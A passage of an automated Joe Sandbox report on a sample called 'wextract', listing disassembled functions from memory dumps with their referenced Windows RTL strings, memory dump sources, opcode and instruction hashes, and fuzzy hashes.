                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 1e649cfdd64b1dbf05261861bd9e74474a3d63b6c49bd8d4b352f03ed650a3d0
                                                                                  • Instruction ID: 7b79ce4e21a1351ae38ee6d7e992661844f53dd7829d30454e6bf7de22df38c1
                                                                                  • Opcode Fuzzy Hash: 1e649cfdd64b1dbf05261861bd9e74474a3d63b6c49bd8d4b352f03ed650a3d0
                                                                                  • Instruction Fuzzy Hash: 56E1AF31608781EFE728CF29C884B2AB7E0BF88314F144A5DE5958B2D1EB74F845DB42
                                                                                  Function 045FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 04637B8E
                                                                                  • RTL: Re-Waiting, xrefs: 04637BAC
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04637B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 11ead7d973cdb848d83dcb46817ec1a3c8b74e8736a8f3fb21b7797405b8eea3
                                                                                  • Instruction ID: 1f59d59270b3cf1c3ac2f2020580befc82a6b2a9def83faefd124aafcaf16efb
                                                                                  • Opcode Fuzzy Hash: 11ead7d973cdb848d83dcb46817ec1a3c8b74e8736a8f3fb21b7797405b8eea3
                                                                                  • Instruction Fuzzy Hash: DE41D0357007429FDB24DE25DC40B6BB7E5FF88715F000A1DEA5A9B680EB31F8059B96
                                                                                  Function 045FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0463728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 046372A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04637294
                                                                                  • RTL: Re-Waiting, xrefs: 046372C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: a55576790579b541aa6c2fc25b67cdeeefded1762d5cbc8ed6694ace38dd3271
                                                                                  • Instruction ID: 209d0bc09714f9ce1ff25d4312c4a28056d69ede39f31e9b2d5397d88d14f5ce
                                                                                  • Opcode Fuzzy Hash: a55576790579b541aa6c2fc25b67cdeeefded1762d5cbc8ed6694ace38dd3271
                                                                                  • Instruction Fuzzy Hash: 7B411071700246ABDB20DE24CC41F6AB7A1FF84716F104619FA55AB240FB21F812DBD5
                                                                                  Function 048E3A40 Relevance: 6.3, Strings: 5, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ."fg$dncv$exkr$g."`$p
                                                                                  • API String ID: 0-2351235189
                                                                                  • Opcode ID: 3e91424fb7eef2622d45e34ce2afdec19935037345241ff367c107b7b5a2bb9c
                                                                                  • Instruction ID: bd9224b16e3253e0780bdb591ad83a42cedcf47e780f4139cf862e0ea2a68aaa
                                                                                  • Opcode Fuzzy Hash: 3e91424fb7eef2622d45e34ce2afdec19935037345241ff367c107b7b5a2bb9c
                                                                                  • Instruction Fuzzy Hash: 9AF0F670018B84DFCB059F09D8086B9B7D0FF89308F900BADD485DB291DB74D645C746
                                                                                  Function 04607D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                  • Instruction ID: 828c33e7bccacd634b8705496aa08493245b8d212334400f5a3a1987fab045b2
                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                  • Instruction Fuzzy Hash: 18918070E0021A9BDF2CDE69C881ABFB7A5AF54722F14C51AE855A73C0F730B941CB60
                                                                                  Function 045C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: de4bcea2c091eee597a9af55c9cf8f6fe08d3fccd811792d846b3d511a4062f6
                                                                                  • Instruction ID: 067354ecef944a5247a3b2326a94eddc812d58e04073e88a9de117b0b9ed2a61
                                                                                  • Opcode Fuzzy Hash: de4bcea2c091eee597a9af55c9cf8f6fe08d3fccd811792d846b3d511a4062f6
                                                                                  • Instruction Fuzzy Hash: 61812BB2D006699BDB358F94CD55BEEB7B4BF48714F0041DAA909B7240E7706E84DFA0